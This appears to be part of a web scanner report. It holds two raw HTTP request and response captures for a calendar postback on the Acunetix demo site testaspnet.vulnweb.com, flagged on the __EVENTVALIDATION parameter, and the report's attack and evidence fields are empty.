Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1175 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,175 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8580&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA%2FhzGedsIHgJTRBYBBgBAK8gzeNsIZGRk1aMlp8cuOvmHKkTZGD7EOmApYno%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL2toOJCAKqztTQBQKM1crSCAKK%2Bb%2FgBQKK%2Bb%2FgBQKK%2BdOEDQKK%2BdOEDQKK%2BYfsCwKK%2BYfsCwKK%2BbuDAwKK%2BbuDAwK%2Fk%2BfECQK%2Fk%2BfECQK%2Fk5ubAQK%2Fk5ubAQK%2Fk4%2B%2BCgK%2Fk4%2B%2BCgK%2Fk6PVAwK%2Fk6PVAwK%2Fk9fpDAK%2Fk9fpDAK%2Fk8uMBAK%2Fk8uMBAK%2Fk%2F%2BjDQK%2Fk%2F%2BjDQK%2Fk5PGBgK%2Fk5PGBgK%2Fk8evAwK%2Fk8evAwK%2Fk%2FvCDAK%2Fk%2FvCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB%2BAkCkLqB%2BAkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ%2FKYDAtfZ%2FKYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ%2BPkCAtfZ%2BPkCAtfZ7JwKAtfZ7JwKAqjg%2FoUNAqjg%2FoUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCsvt2Zt58ns4X6toRZy61P2JeVPi
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:08:13 GMT Content-Length: 12461
Response Body - size: 12,461 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA/hzGedsIHgJTRBYBBgBAK8gzeNsIZGRk1aMlp8cuOvmHKkTZGD7EOmApYno=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL2toOJCAKqztTQBQKM1crSCAKK+b/gBQKK+b/gBQKK+dOEDQKK+dOEDQKK+YfsCwKK+YfsCwKK+buDAwKK+buDAwK/k+fECQK/k+fECQK/k5ubAQK/k5ubAQK/k4++CgK/k4++CgK/k6PVAwK/k6PVAwK/k9fpDAK/k9fpDAK/k8uMBAK/k8uMBAK/k/+jDQK/k/+jDQK/k5PGBgK/k5PGBgK/k8evAwK/k8evAwK/k/vCDAK/k/vCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB+AkCkLqB+AkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ/KYDAtfZ/KYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ+PkCAtfZ+PkCAtfZ7JwKAtfZ7JwKAqjg/oUNAqjg/oUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCsvt2Zt58ns4X6toRZy61P2JeVPi" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8613')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:White" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8590')" style="color:Black" title="July 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8591')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8592')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8593')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8594')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8595')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8596')" style="color:Black" title="July 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8597')" style="color:Black" title="July 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8598')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8599')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8600')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8601')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8602')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8603')" style="color:Black" title="July 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8604')" style="color:Black" title="July 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8605')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8606')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8607')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8608')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8609')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8610')" style="color:Black" title="July 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1095 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,095 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8403&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgCADXUd7doIZGRkGm0gfZriQyKfSeJMgejbOG5BChM%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL3qu39BQL%2BkLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no%2FQwC19no%2FQwC19mckAQC19mckAQC19nw%2BQIC19nw%2BQIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe%2Fw8CqOCe%2Fw8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9%2FziBQKN9%2FziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gUwkC9WyDiK6lf585oZaRAvc0tYkg%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:04:26 GMT Content-Length: 12592
Response Body - size: 12,592 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgCADXUd7doIZGRkGm0gfZriQyKfSeJMgejbOG5BChM=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL3qu39BQL+kLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no/QwC19no/QwC19mckAQC19mckAQC19nw+QIC19nw+QIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe/w8CqOCe/w8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9/ziBQKN9/ziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gUwkC9WyDiK6lf585oZaRAvc0tYkg==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">January 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:White" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8408')" style="color:Black" title="January 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8409')" style="color:Black" title="January 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8410')" style="color:Black" title="January 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8411')" style="color:Black" title="January 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8412')" style="color:Black" title="January 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8413')" style="color:Black" title="January 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8414')" style="color:Black" title="January 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8415')" style="color:Black" title="January 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8416')" style="color:Black" title="January 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8417')" style="color:Black" title="January 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8418')" style="color:Black" title="January 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8419')" style="color:Black" title="January 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8420')" style="color:Black" title="January 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8421')" style="color:Black" title="January 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8422')" style="color:Black" title="January 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8423')" style="color:Black" title="January 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8424')" style="color:Black" title="January 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8425')" style="color:Black" title="January 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8426')" style="color:Black" title="January 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8427')" style="color:Black" title="January 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8428')" style="color:Black" title="January 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
